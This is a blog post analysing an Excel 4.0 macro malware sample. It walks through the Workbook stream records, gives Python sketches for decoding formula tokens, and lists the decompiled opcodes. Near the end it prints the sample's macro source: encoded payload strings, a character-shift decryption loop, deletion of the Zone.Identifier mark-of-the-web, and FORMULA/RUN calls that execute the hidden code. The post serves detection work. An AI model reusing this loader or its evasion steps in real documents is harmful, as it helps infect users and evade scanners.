Decompiling Excel Formula (XF) 4.0 malware

Office malware has been around for a long time. In the past I’ve written several blog posts about the basics and beyond. In this post we’ll focus on Excel Formula (XF) 4.0. I wasn’t too familiar with XF 4.0 before I started looking into it, so learn with me.

With VBA macros you’ll find the code easily by decompressing some streams and looking at the source (that is, if it hasn’t been removed or replaced to avoid detection). If the p-code was compiled on the same VBA version, Word will simply run the p-code instead of compiling the source from scratch.

So when we deal with XF – where is the source? Where is the p-code? What actually runs and how does it run? That’s what I’ll try to explain in this short blog post.

All the magic happens in the Workbook stream. This is a simple stream to parse and Microsoft has documented it well. To start with, how do we see if a file with XF has a macro sheet inserted? If we look at record 133 (BoundSheet8) there are clear signs that the file needs more inspection (macro sheet, hidden, very hidden etc). Here are some of the records that will help you dig further:

Record  Name       Description
6       Formula    Contains the binary code that runs the compiled code
24      LBL        Specifies a defined name
252     SST        Specifies string constants
255     ExtSST     Specifies a location of sets of strings which are shared in a table (index into the SST table)
512     Dimension  Specifies the range of the sheet (rows and columns)
638     Rk         Specifies the numeric data of a single cell
189     MulRk      Specifies a series of cells with their numerical data
253     LabelSst   Specifies a cell that contains a string
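
To make the record hunt concrete, here is a minimal sketch of walking the records, assuming the raw bytes of the Workbook stream have already been pulled out of the OLE container. Each BIFF8 record starts with a 2-byte type and a 2-byte length, both little-endian, followed by the payload. The names iter_records, summarize and INTERESTING are mine and purely illustrative, and Continue records are not stitched together here.

```python
import struct

# Record numbers from the table above, plus BoundSheet8 (133).
INTERESTING = {
    6: "Formula", 24: "Lbl", 133: "BoundSheet8", 189: "MulRk",
    252: "SST", 253: "LabelSst", 255: "ExtSST", 512: "Dimension", 638: "Rk",
}

def iter_records(stream: bytes):
    """Yield (record_type, payload) for every record in a Workbook stream."""
    pos = 0
    while pos + 4 <= len(stream):
        # Record header: type and payload size, both unsigned 16-bit little-endian.
        rec_type, size = struct.unpack_from("<HH", stream, pos)
        payload = stream[pos + 4 : pos + 4 + size]
        if len(payload) < size:
            break  # truncated record, stop instead of guessing
        yield rec_type, payload
        pos += 4 + size

def summarize(stream: bytes) -> dict:
    """Count how often each interesting record type occurs."""
    counts = {}
    for rec_type, _payload in iter_records(stream):
        name = INTERESTING.get(rec_type)
        if name is not None:
            counts[name] = counts.get(name, 0) + 1
    return counts
```

Running summarize over a stream gives a quick feel for whether there are Formula and Lbl records worth decoding before you write any real parsing logic.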

Armed with this we’ll attack a sample – 02cb7d611f4f45db1a9fdac6c9b0902fd246c302. When I first checked the sample (2 hours old on VT), it was detected by only 5 engines.


So what’s so special about it? Why did so many miss it? That’s what made me want to look into it.

It has a visible macro sheet, and this has a macro called Auto_Open (this name is a keyword defined from a list of possible names). In total it contains 2 sheets (Sheet1 and IFKPCYYA, which is the macro sheet). You’ll find this info in the BoundSheet8 record (133).
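
As a rough sketch of how that check could look, the BoundSheet8 payload is a 4-byte stream offset, one byte whose low 2 bits hold the hidden state, one byte for the sheet type, and then a short string with the sheet name. The function and table names below are my own, and the offset in the usage example is a made-up value.

```python
import struct

HIDDEN_STATE = {0: "visible", 1: "hidden", 2: "very hidden"}
SHEET_TYPE = {0: "worksheet or dialog sheet", 1: "macro sheet",
              2: "chart sheet", 6: "VBA module"}

def parse_boundsheet8(payload: bytes) -> dict:
    """Decode the payload of a BoundSheet8 record (type 133)."""
    # lbPlyPos (4 bytes), hsState byte, dt byte, then the name as
    # cch (1 byte) + string flags (1 byte) + characters.
    offset, state, sheet_type, cch, str_flags = struct.unpack_from("<IBBBB", payload, 0)
    if str_flags & 0x01:
        # fHighByte set: two bytes per character
        name = payload[8 : 8 + 2 * cch].decode("utf-16-le")
    else:
        # compressed: one byte per character
        name = payload[8 : 8 + cch].decode("latin-1")
    return {
        "name": name,
        "offset": offset,
        "visibility": HIDDEN_STATE.get(state & 0x03, "unknown"),
        "type": SHEET_TYPE.get(sheet_type, "unknown"),
    }

# Hypothetical payload for the macro sheet in this sample (offset is invented).
example = struct.pack("<IBBBB", 0x1234, 0, 1, 8, 0) + b"IFKPCYYA"
info = parse_boundsheet8(example)
```

Anything that comes back as a macro sheet, and especially a hidden or very hidden one, is a good reason to go on and decode the Formula records.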

When we find the first Formula-record it looks like this:

[Image: hex dump of the first Formula record]

What does this mean? When you look at the documentation for a Formula record you’ll find that it has a header (20 bytes) which identifies the cell and gives you more metadata about what is going to happen. The next 2 bytes give you the length of the actual opcodes (0x000F). The first opcode is 0x17, which is a PtgStr. This contains, among other things, the length of the embedded string. The next opcode you’ll find is 0x1e (PtgInt), which says that an integer follows. The last opcode in this section is 0x42 (PtgFuncVar). This describes which function to invoke and how many parameters are passed to it. Converting the Formula record above to code, you get:

[Image: the first Formula record converted to code]

So basically it pushes two values onto a stack (the string “x_b2w” and the integer 0). It then invokes the function DEFINE.NAME. It looks like it’s setting the variable “x_b2w” to 0.
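
The push-then-call behaviour described above can be sketched in a few lines. This is only an illustration covering the three opcodes seen so far, not a full decompiler. The 15 bytes are taken from row 1 of the listing further down, with the final 0x77 ('w') filled in from the decoded string because the dump only shows the first 7 bytes of each token. The names disassemble, to_formula and FUNC_NAMES are my own.

```python
import struct

# (tab, fCeFunc) -> name; only the one function seen in this formula.
FUNC_NAMES = {(61, True): "DEFINE.NAME"}

FIRST_RGCE = bytes.fromhex("17 05 00 78 5F 62 32 77 1E 00 00 42 02 3D 80")

def disassemble(rgce: bytes) -> list:
    """Turn raw formula bytes into a list of (token_name, value) pairs."""
    tokens, pos = [], 0
    while pos < len(rgce):
        op = rgce[pos]
        if op == 0x17:  # PtgStr: length byte, flags byte, characters
            cch, flags = rgce[pos + 1], rgce[pos + 2]
            width = 2 if flags & 0x01 else 1
            raw = rgce[pos + 3 : pos + 3 + cch * width]
            text = raw.decode("utf-16-le" if width == 2 else "latin-1")
            tokens.append(("PtgStr", text))
            pos += 3 + cch * width
        elif op == 0x1E:  # PtgInt: unsigned 16-bit integer
            (value,) = struct.unpack_from("<H", rgce, pos + 1)
            tokens.append(("PtgInt", value))
            pos += 3
        elif op in (0x22, 0x42, 0x62):  # PtgFuncVar in its three classes
            argc = rgce[pos + 1] & 0x7F
            (word,) = struct.unpack_from("<H", rgce, pos + 2)
            tokens.append(("PtgFuncVar", (argc, word & 0x7FFF, bool(word & 0x8000))))
            pos += 4
        else:
            raise ValueError(f"opcode 0x{op:02X} is not handled in this sketch")
    return tokens

def to_formula(tokens: list) -> str:
    """Replay the tokens against a stack to rebuild the formula text."""
    stack = []
    for kind, value in tokens:
        if kind == "PtgStr":
            stack.append('"' + value.replace('"', '""') + '"')
        elif kind == "PtgInt":
            stack.append(str(value))
        elif kind == "PtgFuncVar":
            argc, tab, is_command = value
            name = FUNC_NAMES.get((tab, is_command), f"FUNC_{tab}")
            first_arg = len(stack) - argc
            args = stack[first_arg:]
            del stack[first_arg:]
            stack.append(f"{name}({','.join(args)})")
    return stack[-1]
```

Calling to_formula(disassemble(FIRST_RGCE)) rebuilds DEFINE.NAME("x_b2w",0), and the byte count of FIRST_RGCE matches the 0x000F length field.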

The next formula looks like this:

[Image: hex dump of the second Formula record]

After the header we see the following code being run:

[Image: decoded opcodes of the second Formula record]

So, it’s starting to build a while loop: index 2 (which I’ll describe shortly) is compared against the integer 49, and as long as it’s LT (Less Than), it will iterate…
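
Operators and fixed-argument functions fit the same stack idea. Below is a small sketch that renders the bytes of this second formula (row 2 in the listing further down). The helper render and the two lookup tables are hypothetical names of mine, names are shown as a placeholder like Name2 unless you pass in a mapping, and operator precedence and parentheses are ignored.

```python
import struct

BINARY_OPS = {0x03: "+", 0x08: "&", 0x09: "<", 0x0B: "="}
# iftab -> (name, number of arguments) for the PtgFunc calls in the listing
FIXED_FUNCS = {108: ("SET.VALUE", 2), 172: ("WHILE", 1), 174: ("NEXT", 0)}

def render(rgce: bytes, names=None) -> str:
    """Rebuild formula text from a handful of token types."""
    names = names or {}
    stack, pos = [], 0
    while pos < len(rgce):
        op = rgce[pos]
        if op == 0x43:  # PtgName: 4-byte index into the defined names
            (index,) = struct.unpack_from("<I", rgce, pos + 1)
            stack.append(names.get(index, f"Name{index}"))
            pos += 5
        elif op == 0x1E:  # PtgInt
            (value,) = struct.unpack_from("<H", rgce, pos + 1)
            stack.append(str(value))
            pos += 3
        elif op in BINARY_OPS:  # pop two operands, push the joined text
            right = stack.pop()
            left = stack.pop()
            stack.append(f"{left}{BINARY_OPS[op]}{right}")
            pos += 1
        elif op == 0x41:  # PtgFunc: argument count is implied by the function
            (iftab,) = struct.unpack_from("<H", rgce, pos + 1)
            name, argc = FIXED_FUNCS[iftab]
            first_arg = len(stack) - argc
            args = stack[first_arg:]
            del stack[first_arg:]
            stack.append(f"{name}({','.join(args)})")
            pos += 3
        else:
            raise ValueError(f"opcode 0x{op:02X} is not handled in this sketch")
    return stack[-1]

SECOND_RGCE = bytes.fromhex("43 02 00 00 00 1E 31 00 09 41 AC 00")
```

With no name table, render(SECOND_RGCE) comes out as WHILE(Name2<49). Pass a dictionary of index to name once you have resolved the Lbl records.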

Index 2 brings me on to some of the other records you’ll need. Sometimes you’ll see the opcodes reference data in sheets: strings, integers or doubles. You’ll need to access these through the records I mentioned in the beginning.
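
Numeric cells are a good example of why those records need their own decoding. The Rk and MulRk records store each number as a packed 32-bit value: bit 0 says the value must be divided by 100, bit 1 says the remaining 30 bits are a signed integer, and otherwise those 30 bits are the top of an IEEE double. A minimal sketch, with decode_rk being my own name for it:

```python
import struct

def decode_rk(rk: int):
    """Decode a 32-bit RK number into an int or float."""
    div_by_100 = rk & 0x01
    is_integer = rk & 0x02
    if is_integer:
        value = rk >> 2            # 30-bit payload
        if value & (1 << 29):      # sign bit of the 30-bit integer
            value -= 1 << 30
    else:
        # The payload is the upper 30 bits of a double; the low 34 bits are zero.
        packed = struct.pack("<II", 0, rk & 0xFFFFFFFC)
        (value,) = struct.unpack("<d", packed)
    if div_by_100:
        value = value / 100
    return value
```

Once this is in place, a reference from a formula to a numeric cell can be resolved to the actual number instead of an opaque 4-byte blob.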

There is an Lbl record:

[Image: hex dump of the Lbl record]

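This describes two entries. The second one is the string “x_l5”. Going by the full listing below, though, index 2 resolves to x_b2w (row 4 increments it with DEFINE.NAME) and index 3 to x_l5, so the loop is comparing the value x_b2w to the integer 49. Not a surprise, as the previous formula set it to 0.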

This is a quest you’ll need to follow with the rest of the opcodes, and here is what it will look like once you complete this quest:

row 1, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
 17 05 00 78 5F 62 32 	PtgStr: x_b2w
 1E 00 00             	PtgInt: 0
 42 02 3D 80          	PtgFuncVar: DEFINE.NAME, param=2, tab=61, fCeFunc=1
row 2, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
 43 02 00 00 00       	PtgName: index 2
 1E 31 00             	PtgInt: 49
 09                   	PtgLt:
 41 AC 00             	PtgFunc: WHILE (172)
row 3, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
 17 04 00 78 5F 6C 35 	PtgStr: x_l5
 1F 00 00 00 00 00 00 	PtgNum: 0.000000
 42 02 3D 80          	PtgFuncVar: DEFINE.NAME, param=2, tab=61, fCeFunc=1
row 4, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
 17 05 00 78 5F 62 32 	PtgStr: x_b2w
 43 02 00 00 00       	PtgName: index 2
 1E 01 00             	PtgInt: 1
 03                   	PtgAdd:
 42 02 3D 80          	PtgFuncVar: DEFINE.NAME, param=2, tab=61, fCeFunc=1
row 5, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
 43 03 00 00 00       	PtgName: index 3
 1E 16 00             	PtgInt: 22
 09                   	PtgLt:
 41 AC 00             	PtgFunc: WHILE (172)
row 6, col 0, ifxe 15, FormulaValue=01 00 00 00 00 00 fExpr0=FFFF flags=0000
 17 04 00 78 5F 6C 35 	PtgStr: x_l5
 43 03 00 00 00       	PtgName: index 3
 1E 01 00             	PtgInt: 1
 03                   	PtgAdd:
 42 02 3D 80          	PtgFuncVar: DEFINE.NAME, param=2, tab=61, fCeFunc=1
row 7, col 0, ifxe 15, FormulaValue=02 00 1D 00 00 00 fExpr0=FFFF flags=0000
 19 01 00 00          	PtgAttrSemi:
 43 03 00 00 00       	PtgName: index 3
 1E 01 00             	PtgInt: 1
 03                   	PtgAdd:
 1E 26 00             	PtgInt: 38
 43 02 00 00 00       	PtgName: index 2
 03                   	PtgAdd:
 42 02 DB 00          	PtgFuncVar: ADDRESS, param=2, tab=219, fCeFunc=0
 42 01 94 00          	PtgFuncVar: INDIRECT, param=1, tab=148, fCeFunc=0
 17 09 00 6B 6F 76 65 	PtgStr: koveowvnb
 0B                   	PtgEq:
row 8, col 0, ifxe 15, FormulaValue=02 01 1D 00 00 00 fExpr0=FFFF flags=0000
 19 01 00 00          	PtgAttrSemi:
 44 2C 00 01 C0       	PtgRef: loc col=1, row=44, value=EMPTY
 43 03 00 00 00       	PtgName: index 3
 1E 01 00             	PtgInt: 1
 03                   	PtgAdd:
 1E 26 00             	PtgInt: 38
 43 02 00 00 00       	PtgName: index 2
 03                   	PtgAdd:
 42 02 DB 00          	PtgFuncVar: ADDRESS, param=2, tab=219, fCeFunc=0
 42 01 94 00          	PtgFuncVar: INDIRECT, param=1, tab=148, fCeFunc=0
 08                   	PtgConcat:
row 9, col 0, ifxe 15, FormulaValue=02 01 1D 00 00 00 fExpr0=FFFF flags=0000
 44 07 00 00 C0       	PtgRef: loc col=0, row=7, value=EMPTY
 19 02 12 00          	PtgAttrIf: 0012
 17 04 00 78 5F 6C 35 	PtgStr: x_l5
 1E 18 00             	PtgInt: 24
 42 02 3D 80          	PtgFuncVar: DEFINE.NAME, param=2, tab=61, fCeFunc=1
 19 08 14 00          	PtgAttrGoto: 0014
 24 2C 00 01 C0       	PtgRef: loc col=1, row=44, value=EMPTY
 44 08 00 00 C0       	PtgRef: loc col=0, row=8, value=EMPTY
 41 6C 00             	PtgFunc: SET.VALUE (108)
 19 08 03 00          	PtgAttrGoto: 0003
 42 03 01 00          	PtgFuncVar: IF, param=3, tab=1, fCeFunc=0
row 10, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
 41 AE 00             	PtgFunc: NEXT (174)
row 11, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
 44 2C 00 01 C0       	PtgRef: loc col=1, row=44, value=EMPTY
 17 02 00 52 5B       	PtgStr: R[
 43 02 00 00 00       	PtgName: index 2
 08                   	PtgConcat:
 17 05 00 5D 43 5B 30 	PtgStr: ]C[0]
 08                   	PtgConcat:
 19 40 00 01          	PtgAttrSpace: 0100
 24 48 00 00 C0       	PtgRef: loc col=0, row=72, value=EMPTY
 21 4F 00             	PtgFunc: ABSREF (79)
 42 02 60 80          	PtgFuncVar: FORMULA, param=2, tab=96, fCeFunc=1
row 12, col 0, ifxe 15, FormulaValue=01 00 00 00 00 00 fExpr0=FFFF flags=0000
 24 2C 00 01 C0       	PtgRef: loc col=1, row=44, value=EMPTY
 17 00 00             	PtgStr: 
 41 6C 00             	PtgFunc: SET.VALUE (108)
row 13, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
 41 AE 00             	PtgFunc: NEXT (174)
row 202, col 0, ifxe 15, FormulaValue=01 00 00 00 00 00 fExpr0=FFFF flags=0000
 42 00 36 00          	PtgFuncVar: HALT, param=0, tab=54, fCeFunc=0

Alright, so we see 2 loops, an outer and an inner. (I fixed a bug that showed me the wrong function calls in the first version of this article.) Basically you see an outer loop decrypting one line at a time with the inner loop, then calling FORMULA to place the decrypted statement in a cell where it can run. This means hidden code is present, and there is no good reason not to block this file.

Also, you’ll need to find the data in the locations it reads from and writes to, which is why you need to enumerate the other records to access and decode the contents of those locations.

What more can we extract from this sample by looking at the Workbook stream? Some source code? Hmmmm. There is a way...

=SET.VALUE(R1C3,"adadadadadadad")
=SET.VALUE(R1C3,"pupupupupupupupupupupupupupupupupupupu")
=SET.VALUE(R2C3,"efefefefefefefef")
=SET.VALUE(R2C3,"ipipipipipipipipip")
=SET.VALUE(R3C3,"g4g4g4")
=SET.VALUE(R3C3,"ieieieieieieieieie")
=SET.VALUE(R4C3,"zhzhzhzhzhzhzhzhzh")
=SET.VALUE(R4C3,"fifififififififififififififififififififi")
=SET.VALUE(R5C3,"f5")
=SET.VALUE(R5C3,"hjhjhjhjhjhjhjhjhjhjhjhjhjhj")
=SET.VALUE(R6C3,"ccccc")
=SET.VALUE(R6C3,"rarararararararararararararara")
=SET.VALUE(R1C3,"<EDGHOD/MBLF'#obsi^`!-!]Ttdsr]Ovamhd[Endtndost[#(")
=SET.VALUE(R2C3,"<EDGHOD/MBLF'#ejkf^`!-EPOFM)obsi^`%#qd-kr#+4(*")
=SET.VALUE(R3C3,"GVSHUDMM)ejkf^`+#ubq!u20>mfv!@dsjufWPakdds)!#Ljbsntngs/WNKISUO#!*:#(")
=SET.VALUE(R4C3,"<GVSHUDMM)ejkf^`+#u20/nqdo'#!HDU!#+#!isuot90.dnvqtddnnap-dnn.dnnap-qgq>1-715567445/:41790#!-ebktd*:#(")
=SET.VALUE(R5C3,"<GVSHUDMM)ejkf^`+#u20/rfme'*:#(")
=SET.VALUE(R6C3,"<GVSHUDMM)ejkf^`+#ubq!az<odx­BbuhwdYNcifbu'#!BCPCC-Tssdbl#!*:#(")
=SET.VALUE(R7C3,"<GVSHUDMM)ejkf^`+#az-pofm)(<!*")
=SET.VALUE(R8C3,"<GVSHUDMM)ejkf^`+#az-uxqd>0<!*")
=SET.VALUE(R9C3,"<GVSHUDMM)ejkf^`+#az-xqjsf'w02-sdtopmtdCnex*!*")
=SET.VALUE(R10C3,"<GVSHUDMM)ejkf^`+#az-T`wdUnGhmd)!#[]Ttdsr][Qtckjb][Endtndost[]id-dom!#+3(<!*")
=SET.VALUE(R11C3,"<GVSHUDMM)ejkf^`+#az-dkprf'*:#(")
=SET.VALUE(R12C3,"<GBMNTD)ejkf^`(")
=SET.VALUE(R13C3,"<FWFB)!fwqkpqfq/dyd!!'obsi^`%#qd-kr#(")
=SET.VALUE(R14C3,"<XGJKF'JRFQSNS'GHMDT'q`ug`^'!kb/bqk#(*(")
=SET.VALUE(R15C3,"<X@JS)MPV)(,!1/;/1910#(")
=SET.VALUE(R16C3,"<ODYS)(")
=SET.VALUE(R17C3,"<GHMD/CFKFSF'q`ug`^'!sb/it!*")
=SET.VALUE(R18C3,"<FWFB)!fwqkpqfq/dyd!!'obsi^`%#id-dom!*­!­!")
=SET.VALUE(R19C3,"")
=ERROR(TRUE,R1C1)       
=FILE.DELETE(GET.DOCUMENT(IF(COS(RAND())<3,1,100)+1)&"\\"&GET.DOCUMENT(88)&":Zone.Identifier")
=ERROR(FALSE)  
=SET.VALUE(R21C4,202)
=SET.VALUE(R21C4,IF(SIN(LEN(GET.WORKSPACE(1)))<2,IF(RESET.TOOLBAR(1),1,100),100))
=WHILE(R21C4<=20)     
=SET.VALUE(R23C4,INDIRECT(ADDRESS(R21C4,3)))                  
=SET.VALUE(R24C4,LEN(R23C4))        
=SET.VALUE(R57C5,"")                  
=SET.VALUE(R27C4,1)         
=WHILE(R27C4<=R24C4)
=SET.VALUE(R57C5,R57C5&CHAR(CODE(MID(R23C4,R27C4,1))+IF(MOD(R27C4,2)=0,-1,1)))
=SET.VALUE(R27C4,R27C4+1)
=NEXT()         
=SET.VALUE(R21C4,R21C4+1)           
=FORMULA(R57C5, ABSREF("R["&R21C4&"]C[0]",R41C2))
=NEXT()        

=RUN(R41C2)                    
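
The inner WHILE loop in the source above walks each encoded string one character at a time and adds 1 to the character code at odd positions and subtracts 1 at even positions (positions are 1-based, as in MID). A minimal Python sketch of the same transform follows. decode_line is my own helper name, and it assumes the characters map one to one onto Python code points, which holds for the plain ASCII parts of the strings.

```python
def decode_line(encoded: str) -> str:
    """Undo the +1/-1 character shift used by the macro's inner loop."""
    decoded = []
    for position, char in enumerate(encoded, start=1):
        # Mirrors IF(MOD(position,2)=0,-1,1) from the macro source.
        shift = -1 if position % 2 == 0 else 1
        decoded.append(chr(ord(char) + shift))
    return "".join(decoded)
```

For example, decode_line("<ODYS)(") gives =NEXT() and decode_line("<GBMNTD)ejkf^`(") gives =FCLOSE(file__), so the hidden statements can be recovered without ever opening the file in Excel.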

This code seems to differ from the compiled code in some ways, which is worth investigating. I’ll write another article about that later. It’s not hard to extract this content, but it requires some logic.

Going from here you have many options to take this to the next level. I see no reason why so many engines failed to detect this sample.

Writing good support for XF 4.0 is an effort more anti-malware companies should make. Let me know if you need help.
